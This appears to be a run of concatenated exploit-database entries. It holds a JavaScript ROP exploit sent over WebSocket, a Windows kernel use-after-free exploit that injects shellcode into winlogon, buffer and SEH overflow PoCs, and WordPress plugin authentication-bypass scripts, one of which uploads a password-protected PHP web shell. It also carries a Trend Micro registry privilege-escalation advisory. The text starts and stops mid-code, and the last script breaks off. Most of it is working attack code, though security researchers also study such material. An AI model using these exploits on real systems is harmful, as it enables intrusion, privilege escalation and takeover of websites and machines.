jr $ra; addiu $sp, $sp, 0x10; //call sleep previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, payloadAddr) //set s0 = payload insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; var string = new TextDecoder("utf-8").decode(arr); var newArr = new TextEncoder("utf-8").encode(string); console.log(buf2hex(newArr)); exploit = '{"jsonrpc":"2.0","method":"Frontend::GetFrontendSpectrumData","params":{"coreID":0,"fStartHz":' + string + ',"fStopHz":1000000000,"fftSize":1024,"gain":1},"id":"0"}' console.log(exploit) console.log(testEqual(arr, newArr)); var socket = new WebSocket("ws://spectrum:[email protected]:6080/Frontend", 'rpc-frontend') socket.onopen = function(e) { socket.send(exploit) fetch('/payload') };

/* The exploit works on 19H1. It was tested with ntoskrnl version 10.0.18362.295 EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47935.zip */ #include <Windows.h> #include <stdio.h> #include <string> #include <ntstatus.h> #include <processthreadsapi.h> #include <winternl.h> #include <tlhelp32.h> #pragma comment(lib, "ntdll.lib") // run cmd.exe unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \ "\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ "\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \ "\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \ "\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \ "\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \ "\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \ "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \ "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \ "\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \ "\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \ "\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \ "\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \ "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \ "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \ "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \ "\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \ "\x78\x65\x00"; static const unsigned int shellcode_len = 0x1000; #define MAXIMUM_FILENAME_LENGTH 255 #define SystemModuleInformation 0xb #define SystemHandleInformation 0x10 typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; void* Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE, * PSYSTEM_HANDLE; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE Handels[1]; } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; typedef struct SYSTEM_MODULE { ULONG Reserved1; ULONG Reserved2; #ifdef _WIN64 ULONG Reserved3; #endif PVOID ImageBaseAddress; ULONG ImageSize; ULONG Flags; WORD Id; WORD Rank; WORD w018; WORD NameOffset; CHAR Name[MAXIMUM_FILENAME_LENGTH]; }SYSTEM_MODULE, * PSYSTEM_MODULE; typedef struct SYSTEM_MODULE_INFORMATION { ULONG ModulesCount; SYSTEM_MODULE Modules[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; // exploit specific type information typedef struct _FILE_FULL_EA_INFORMATION { ULONG NextEntryOffset; // +0x0 UCHAR Flags; // +4 UCHAR EaNameLength; // +5 USHORT EaValueLength; // +6 CHAR EaName[1]; // +9 } FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION; typedef struct _PROC_DATA { HANDLE apcthread; // +0x0 void* unknown1; // +0x8 void* unknown2; // +0x10 void* unknown3; // +0x18 void* unknown4; // +0x20 } PROC_DATA, * PPROC_DATA; typedef struct _SOCK_DATA { HANDLE unknown; // +0x0 HANDLE procDataHandle; // +0x8 } SOCK_DATA, * PSOCK_DATA; // undocumented apis definitions typedef NTSTATUS(WINAPI* NtWriteFile_t)(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG key); typedef NTSTATUS(WINAPI* NtTestAlert_t)(void); typedef NTSTATUS(WINAPI* RtlGetVersion_t)(PRTL_OSVERSIONINFOW lpVersionInformation); // resolved function pointers at runtime NtTestAlert_t g_NtTestAlert = 0; NtWriteFile_t g_NtWriteFile = 0; RtlGetVersion_t g_RtlGetVersion = 0; HANDLE g_Event1 = NULL; HANDLE g_Event2 = NULL; HANDLE g_Event3 = NULL; int g_done1 = 0; int g_done2 = 0; #define TOKEN_OFFSET 0x40 //_SEP_TOKEN_PRIVILEGES offset #define OFFSET_LINKEDLIST 0xA8 //kthread apc offset // generic helper function void InjectToWinlogon() { PROCESSENTRY32 entry; entry.dwSize = sizeof(PROCESSENTRY32); HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); int pid = -1; if (Process32First(snapshot, &entry)) { while (Process32Next(snapshot, &entry)) { if (_strcmpi(entry.szExeFile, "winlogon.exe") == 0) { pid = entry.th32ProcessID; break; } } } CloseHandle(snapshot); if (pid < 0) { printf("Could not find process\n"); return; } HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (!h) { printf("Could not open process: %x", GetLastError()); return; } void* buffer = VirtualAllocEx(h, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!buffer) { printf("[-] VirtualAllocEx failed\n"); } if (!buffer) { printf("[-] remote allocation failed"); return; } if (!WriteProcessMemory(h, buffer, shellcode, sizeof(shellcode), 0)) { printf("[-] WriteProcessMemory failed"); return; } HANDLE hthread = CreateRemoteThread(h, 0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0); if (hthread == INVALID_HANDLE_VALUE) { printf("[-] CreateRemoteThread failed"); return; } } HMODULE GetNOSModule() { HMODULE hKern = 0; hKern = LoadLibraryEx("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); return hKern; } DWORD64 GetModuleAddr(const char* modName) { PSYSTEM_MODULE_INFORMATION buffer = (PSYSTEM_MODULE_INFORMATION)malloc(0x20); DWORD outBuffer = 0; NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, 0x20, &outBuffer); if (status == STATUS_INFO_LENGTH_MISMATCH) { free(buffer); buffer = (PSYSTEM_MODULE_INFORMATION)malloc(outBuffer); status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, buffer, outBuffer, &outBuffer); } if (!buffer) { printf("[-] NtQuerySystemInformation error\n"); return 0; } for (unsigned int i = 0; i < buffer->ModulesCount; i++) { PVOID kernelImageBase = buffer->Modules[i].ImageBaseAddress; PCHAR kernelImage = (PCHAR)buffer->Modules[i].Name; if (_stricmp(kernelImage, modName) == 0) { free(buffer); return (DWORD64)kernelImageBase; } } free(buffer); return 0; } DWORD64 GetKernelPointer(HANDLE handle, DWORD type) { PSYSTEM_HANDLE_INFORMATION buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(0x20); DWORD outBuffer = 0; NTSTATUS status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, 0x20, &outBuffer); if (status == STATUS_INFO_LENGTH_MISMATCH) { free(buffer); buffer = (PSYSTEM_HANDLE_INFORMATION) malloc(outBuffer); status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, buffer, outBuffer, &outBuffer); } if (!buffer) { printf("[-] NtQuerySystemInformation error \n"); return 0; } for (size_t i = 0; i < buffer->NumberOfHandles; i++) { DWORD objTypeNumber = buffer->Handels[i].ObjectTypeNumber; if (buffer->Handels[i].ProcessId == GetCurrentProcessId() && buffer->Handels[i].ObjectTypeNumber == type) { if (handle == (HANDLE)buffer->Handels[i].Handle) { //printf("%p %d %x\n", buffer->Handels[i].Object, buffer->Handels[i].ObjectTypeNumber, buffer->Handels[i].Handle); DWORD64 object = (DWORD64)buffer->Handels[i].Object; free(buffer); return object; } } } printf("[-] handle not found\n"); free(buffer); return 0; } DWORD64 GetGadgetAddr(const char* name) { DWORD64 base = GetModuleAddr("\\SystemRoot\\system32\\ntoskrnl.exe"); HMODULE mod = GetNOSModule(); if (!mod) { printf("[-] leaking ntoskrnl version\n"); return 0; } DWORD64 offset = (DWORD64)GetProcAddress(mod, name); DWORD64 returnValue = base + offset - (DWORD64)mod; FreeLibrary(mod); return returnValue; } /* After the bug is triggerd the first thime, this threads gets notified and it will trigger its function pointer, which will call our gadget function and write the first 8 bytes. */ DWORD WINAPI APCThread1(LPVOID lparam) { SetEvent(g_Event1); while (1) { if (g_done1) { printf("[+] triggering first APC execution\n"); g_NtTestAlert(); while (1) { Sleep(0x1000); } } else { Sleep(1); } } return 0; } /* After the bug is triggerd the second thime, this threads gets notified and it will trigger its function pointer again and write the second 8 bytes. After that the shellcode is injected into the system process. */ DWORD WINAPI APCThread2(LPVOID lparam) { SetEvent(g_Event2); while (1) { if (g_done2) { printf("[+] triggering second APC execution\n"); g_NtTestAlert(); InjectToWinlogon(); SetEvent(g_Event3); while (1) { Sleep(0x1000); } } else { Sleep(1); } } return 0; } HANDLE CreateSocketHandle(HANDLE procHandle) { HANDLE fileHandle = 0; UNICODE_STRING deviceName; OBJECT_ATTRIBUTES object; IO_STATUS_BLOCK IoStatusBlock; RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsSct"); InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(SOCK_DATA)); if (!eaBuffer) { printf("[-] malloc error\n"); return fileHandle; } eaBuffer->NextEntryOffset = 0; eaBuffer->Flags = 0; eaBuffer->EaNameLength = sizeof("NifsSct") - 1; eaBuffer->EaValueLength = sizeof(SOCK_DATA); RtlCopyMemory(eaBuffer->EaName, "NifsSct", (SIZE_T)eaBuffer->EaNameLength + 1); SOCK_DATA * eaData = (SOCK_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") - 4); eaData->unknown = (void*) 0x242424224; eaData->procDataHandle = (void*) procHandle; NTSTATUS status = NtCreateFile(&fileHandle, GENERIC_WRITE, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsSct") + sizeof(PROC_DATA)); if (status != STATUS_SUCCESS) { printf("[-] NtCreateFile error: %x \n", status); free(eaBuffer); return fileHandle; } free(eaBuffer); return fileHandle; } HANDLE CreateProcessHandle(HANDLE hAPCThread) { HANDLE fileHandle = 0; UNICODE_STRING deviceName; OBJECT_ATTRIBUTES object; IO_STATUS_BLOCK IoStatusBlock; RtlInitUnicodeString(&deviceName, (PWSTR)L"\\Device\\WS2IFSL\\NifsPvd"); InitializeObjectAttributes(&object, &deviceName, 0, NULL, NULL); FILE_FULL_EA_INFORMATION* eaBuffer = (FILE_FULL_EA_INFORMATION*)malloc(sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); if (!eaBuffer) { printf("[-] malloc error\n"); return fileHandle; } eaBuffer->NextEntryOffset = 0; eaBuffer->Flags = 0; eaBuffer->EaNameLength = sizeof("NifsPvd") - 1; eaBuffer->EaValueLength = sizeof(PROC_DATA); RtlCopyMemory(eaBuffer->EaName, "NifsPvd", (SIZE_T)eaBuffer->EaNameLength + 1); PROC_DATA * eaData = (PROC_DATA*)(((char*)eaBuffer) + sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") - 4); if (!hAPCThread) { printf("[-] error thread not found\n"); free(eaBuffer); return 0; } eaData->apcthread = (void*) hAPCThread; // thread must be in current process eaData->unknown1 = (void*) 0x2222222; // APC Routine eaData->unknown2 = (void*) 0x3333333; // cancel Rundown Routine eaData->unknown3 = (void*) 0x4444444; eaData->unknown4 = (void*) 0x5555555; NTSTATUS status = NtCreateFile(&fileHandle, MAXIMUM_ALLOWED, &object, &IoStatusBlock, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF, 0, eaBuffer, sizeof(FILE_FULL_EA_INFORMATION) + sizeof("NifsPvd") + sizeof(PROC_DATA)); if (status != STATUS_SUCCESS) { printf("[-] NtCreateFile error: %x \n", status); free(eaBuffer); return fileHandle; } free(eaBuffer); return fileHandle; } int DoHeapSpray(DWORD64 writeAddress, DWORD64 kthreadAddress) { DWORD64 nopPointer = GetGadgetAddr("xHalTimerWatchdogStop"); if (!nopPointer) { printf("[-] SeSetAccessStateGenericMapping not found\n"); return 0; } DWORD64 funPointer = GetGadgetAddr("SeSetAccessStateGenericMapping"); if (!funPointer) { printf("[-] SeSetAccessStateGenericMapping not found\n"); return 0; } UCHAR payload[0x120 - 0x48]; memset(payload, 0x0, sizeof(payload)); DWORD64 x = 0x41414141414141; memcpy(payload, &x, 8); x = 0x12121212; memcpy(payload + 8, &x, 8); x = kthreadAddress + OFFSET_LINKEDLIST; // apc linked list memcpy(payload + 0x10, &x, 8); x = kthreadAddress + OFFSET_LINKEDLIST; memcpy(payload + 0x18, &x, 8); x = funPointer; memcpy(payload + 0x20, &x, 8); // this is the RIP we want to execute, in case of NtTestAlert x = nopPointer; memcpy(payload + 0x28, &x, 8); // this is the RIP we want to execute, in case of rundown routine x = 0xffffffffffffffff; // this is to be written memcpy(payload + 0x30, &x, 8); x = 0xffffffffffffffff; // this is to be written, but it gets changed.. memcpy(payload + 0x38, &x, 8); x = 0x2424242424242424; memcpy(payload + 0x40, &x, 8); x = writeAddress; // this is where to write memcpy(payload + 0x48, &x, 8); for (size_t i = 0; i < 0x70; i++) { HANDLE readPipe; HANDLE writePipe; DWORD resultLength = 0; BOOL res = CreatePipe(&readPipe, &writePipe, NULL, sizeof(payload)); if (!res) { printf("[-] error creating pipe\n"); return 0; } res = WriteFile(writePipe, payload, sizeof(payload), &resultLength, NULL); } return 1; } /* This function will trigger the use after free in ws2ifsl.sys and will try to reallocate the buffer with controlled content. */ void TriggerBug(HANDLE threadHandle, DWORD64 writeAddress, DWORD64 kthreadAddress, int id) { HANDLE procHandle = CreateProcessHandle(threadHandle); printf("[!] procHandle %x\n", (DWORD)procHandle); HANDLE sockHandle = CreateSocketHandle(procHandle); printf("[!] sockHandle %x\n", (DWORD)sockHandle); char* readBuffer = (char*)malloc(0x100); DWORD bytesRead = 0; IO_STATUS_BLOCK io; LARGE_INTEGER byteOffset; byteOffset.HighPart = 0; byteOffset.LowPart = 0; byteOffset.QuadPart = 0; byteOffset.u.LowPart = 0; byteOffset.u.HighPart = 0; ULONG key = 0; CloseHandle(procHandle); NTSTATUS ret = g_NtWriteFile(sockHandle, 0, 0, 0, &io, readBuffer, 0x100, &byteOffset, &key); // this close the objecte and we trigger the use after free CloseHandle(sockHandle); // this spray will reclaim the buffer if (!DoHeapSpray(writeAddress, kthreadAddress)) { printf("[-] error doHeapSpray\n"); return; } if (id == 1) { g_done1 = 1; } if (id == 2) { g_done2 = 1; } printf("[+] done\n"); Sleep(0x20); free(readBuffer); return; } /* This function resolves all function pointer for native api calls. */ bool InitFunctionPointers() { HMODULE hNtDll = NULL; hNtDll = LoadLibrary("ntdll.dll"); if (!hNtDll) { printf("error\n"); return false; } g_NtTestAlert = (NtTestAlert_t)GetProcAddress(hNtDll, "NtTestAlert"); if (!g_NtTestAlert) { printf("error\n"); return false; } g_NtWriteFile = (NtWriteFile_t)GetProcAddress(hNtDll, "NtWriteFile"); if (!g_NtWriteFile) { printf("[-] GetProcAddress() NtWriteFile failed.\n"); return false; } g_RtlGetVersion = (RtlGetVersion_t)GetProcAddress(hNtDll, "RtlGetVersion"); if (!g_NtWriteFile) { printf("[-] GetProcAddress() RtlGetVersion failed.\n"); return false; } return true; } int main() { // intialize event for thread synchronization g_Event1 = CreateEvent(0, 0, 0, 0); g_Event2 = CreateEvent(0, 0, 0, 0); g_Event3 = CreateEvent(0, 0, 0, 0); if (g_Event1 == INVALID_HANDLE_VALUE || !g_Event1) { printf("[-] CreateEvent failed\n"); return 0; } if (g_Event2 == INVALID_HANDLE_VALUE || !g_Event2) { printf("[-] CreateEvent failed\n"); return 0; } if (g_Event3 == INVALID_HANDLE_VALUE || !g_Event2) { printf("[-] CreateEvent failed\n"); return 0; } if (!InitFunctionPointers()) { printf("[-] InitFunctionPointers failed\n"); return 0; } HANDLE proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId()); if (!proc) { printf("[-] OpenProcess failed\n"); return 0; } HANDLE token = 0; if (!OpenProcessToken(proc, TOKEN_ADJUST_PRIVILEGES, &token)) { printf("[-] OpenProcessToken failed\n"); return 0; } DWORD64 ktoken = GetKernelPointer(token, 0x5); DWORD64 where = ktoken + TOKEN_OFFSET; printf("[+] found token at: %p\n", (DWORD64) ktoken); // check the supported version of this exploit, otherwise we would crash RTL_OSVERSIONINFOW osversion; g_RtlGetVersion(&osversion); if (osversion.dwMajorVersion == 10 && osversion.dwBuildNumber == 18362) { printf("[+] version supported\n"); } else { printf("[-] sorry version not supported\n"); return 0; } HANDLE hAPCThread1 = CreateThread(0, 0, APCThread1, 0, 0, 0); if (hAPCThread1 == INVALID_HANDLE_VALUE || !hAPCThread1) { printf("[-] error CreateThread\n"); return 0; } HANDLE hAPCThread2 = CreateThread(0, 0, APCThread2, 0, 0, 0); if (hAPCThread2 == INVALID_HANDLE_VALUE || !hAPCThread2) { printf("[-] error CreateThread\n"); return 0; } DWORD64 threadAddrAPC1 = GetKernelPointer(hAPCThread1, 0x8); if (!threadAddrAPC1) { printf("[-] GetKernelPointer error \n"); return 0; } DWORD64 threadAddrAPC2 = GetKernelPointer(hAPCThread2, 0x8); if (!threadAddrAPC2) { printf("[-] GetKernelPointer error \n"); return 0; } // wait for threads to be initialized WaitForSingleObject(g_Event1, -1); WaitForSingleObject(g_Event2, -1); TriggerBug(hAPCThread1, where-8, threadAddrAPC1, 1); TriggerBug(hAPCThread2, where, threadAddrAPC2, 2); WaitForSingleObject(g_Event3, -1); ExitProcess(0); return 0; }

# Exploit Title: APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC) # Exploit Author: Ismail Tasdelen # Exploit Date: 2020-01-16 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/apkf_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install APKF Product Key Finder 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.APKF Product Key Finder Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite) # Date: 2020-01-16 # Exploit Author: antonio # Vendor Homepage: http://www.torrentrockyou.com/ # Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe # Version: 1.51 Build 117 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the # Registration Code input field. #!/usr/bin/python nseh_offset = 4500 total = 5000 # badchars # -------- # 0x00, 0x0a, 0x0d, 0x80 # 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a # 0x61-0x6f, 0x9a, 0x9c, 0x9e poc = "" poc += "A"*(nseh_offset - 53) poc += "\x90"*53 poc += "\x7d\xcb\x90\x90" # jump backwards to NOPs: jge via SF = OF poc += "\x7f\xb3\x45" # nseh pop pop ret: 3-byte partial overwrite file = open("poc_seh.txt","w") file.write(poc) file.close()

# Exploit Title: Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass # Date: 2020-1-16 # Exploit Author: Raphael Karger # Vendor Homepage: https://infinitewp.com/ # Version: InfiniteWP Client < 1.9.4.5 #!/usr/bin/python3 import requests import json import argparse import base64 import json import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(site, username): json_info = {"iwp_action":"add_site","params":{"username": username}} try: return requests.post(site, timeout=5, verify=False, headers={"User-Agent" : "raphaelrocks"}, data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8")) ) except Exception as e: print("[-] HTTP Exploit Error: {}".format(e)) return False if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin") parser.add_argument("-u", "--url", dest="url", help="Root URL of Site") args = parser.parse_args() site_exploit = exploit(args.url, args.username) if site_exploit and site_exploit.status_code == requests.codes.ok: cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()]) if cookie_string: print("[+] Use Cookies to Login: \n{}".format(cookie_string)) exit(0) print("[-] Exploit Failed")

# Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution # Date: 2020-1-16 # Exploit Author: hyp3rlinx # Vendor Homepage: www.trendmicro.com # Version: Platform Microsoft Windows, Premium Security 2019 (v15), Maximum Security 2019 (v15) # Internet Security 2019 (v15), Antivirus + Security 2019 (v15) [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt [+] ISR: ApparitionSec [Vendor] www.trendmicro.com [Product] Trend Micro Security 2019 (Consumer) Multiple Products Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft. [Vulnerability Type] Security Bypass Protected Service Tampering [CVE Reference] CVE-2019-19697 [Security Issue] Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of registry key to target a process running as SYSTEM. This can allow a malware to gain elevated privileges to take over and shutdown services that require SYSTEM privileges like Trend Micros "Asmp" service "coreServiceShell.exe" which does not allow Administrators to tamper with them. This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. Note administrator privileges are required to exploit this vulnerability. [CVSS 3.0 Scores: 3.9] [Affected versions] Platform Microsoft Windows Premium Security 2019 (v15) Maximum Security 2019 (v15) Internet Security 2019 (v15) Antivirus + Security 2019 (v15) [References] https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx [Exploit/POC] 1) Create a entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe 2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM. 3) Restart the machine or wait until service is restart then you get SYSTEM and can now disable Trend Micro endpoint security coreServiceShell.exe service [Network Access] Local [Severity] Low [Disclosure Timeline] Vendor Notification: October 8, 2019 Vendor confirms issue: October 28, 2019 Vendor release date: January 14, 2020 January 16, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass # Date: 2020-01-16 # Exploit Author: B. Canavate # Vendor Homepage: https://wptimecapsule.com/ # Software Link: https://wptimecapsule.com/ # Version: Wordpress Time Capsule Plugin < 1.21.16 # Tested on: LAMP stack with most recent Wordpress ---- code below ---- # PoC by: B. Canavate # Based on the research done by the fine people at: https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/ # GitHub repo with breakdown: https://github.com/SECFORCE/WPTimeCapsulePOC import requests import sys if len(sys.argv) == 1: print "Usage: poc.py http://127.0.0.1/ - Get Admin cookie" print " poc.py http://127.0.0.1/ shell - Get Admin Cookie + Upload a shell on /wp-content/plugins/shell/shell.php " print " Shell usage: /shell.php?pass=mak3ithapp3n&cmd=COMMAND" else: url = sys.argv[1] session = requests.Session() rawBody = "IWP_JSON_PREFIX" headers = {"Referer":url} response = session.post(url, data=rawBody, headers=headers, verify=False) for cookie in response.cookies: if "logged" in cookie.name: cookieadmin = cookie response2 = session.get(url+"wp-admin/index.php", headers=headers, cookies = response.cookies, verify=False) if "Dashboard" in response2.content: print "This is the cookie that you are looking for :-)" print cookieadmin.name+":"+cookieadmin.value if len(sys.argv) == 3 and sys.argv[2] == "shell": response = session.get(url+"/wp-content/plugins/shell/shell.php?pass=mak3ithapp3n&cmd=",verify=False) if response.status_code != 200 : paramsGet = {"action":"upload-plugin"} paramsPost = {"_wpnonce":"1ef2140910","_wp_http_referer":"/wp-admin/plugin-install.php","install-plugin-submit":"Install Now"} paramsMultipart = [('pluginzip', ('shell.zip', "PK\x03\x04\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x00\x00shell.php\x85\x8d1O\xc30\x10\x85\xe7\xfaW\x9c\xaa\xaaM:4\xa0n\x86P\xa1\x10\x24\x18\xa0\x24\x94\x05!d\xdc\x0b\xb6\x88c+\xe7\x0c\x15\xea\x7f\xc7\xc9\x80\xaav\xe8-\xa7\xbb\xf7\xbd\xf7\xaeWN9\x06a\x92\xf9\xb0\xd6u\xf7\xad\x1bx\x12\x069\x94yv\xff\\d9\xacm\x06\xa5\xc2\xba>d6\xc5\x03\x07\xe5\xbd\x23\x9e\x24\x84\xb2\xb2\xad\xc4\x85\xb4f\x80\xee\x90d\xab\x9d\xd7\xb6\xe1\xf0\xd8\x91\x07\x01(h\x07\xf4\x9fs\xdbye[\x0e_\xc1\xa8\x86\xcf\x1b\xb64\x18.\x16\x97\x07\xc8\x99\xaay\xc2\x180\xd0U\xa4\x89\xd0G\x93\xcf\"\x7f\xd9\xe4\xe5\xeb\xfbL\x9a\xed\xec\x23\x86\xe9\x14N\x24'\x88\x82\x16\xff\xb2\x91\xae\xe0T\x814\x85\xb1\x11?K\xed\x95pn\xd9\x8c{t4\x09\x91\x90\xc2q\xc7U\x90hG\x1eM\xd4\x13q\x7fo5\x86\xb5g{\xb6\xbaa\x7fPK\x01\x02?\x03\x14\x03\x00\x00\x08\x00ra0P\xf2\x0f\x1d\xad\xe2\x00\x00\x00j\x01\x00\x00\x09\x00\x24\x00\x00\x00\x00\x00\x00\x00 \x80\xb4\x81\x00\x00\x00\x00shell.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01\x00LE\x19f\xcc\xd5\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00\x09\x01\x00\x00\x00\x00", 'application/zip'))] headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0","Referer":url+"/wp-admin/plugin-install.php","Connection":"close","Accept-Encoding":"gzip, deflate","DNT":"1","Accept-Language":"en-GB,en;q=0.5"} cookies = 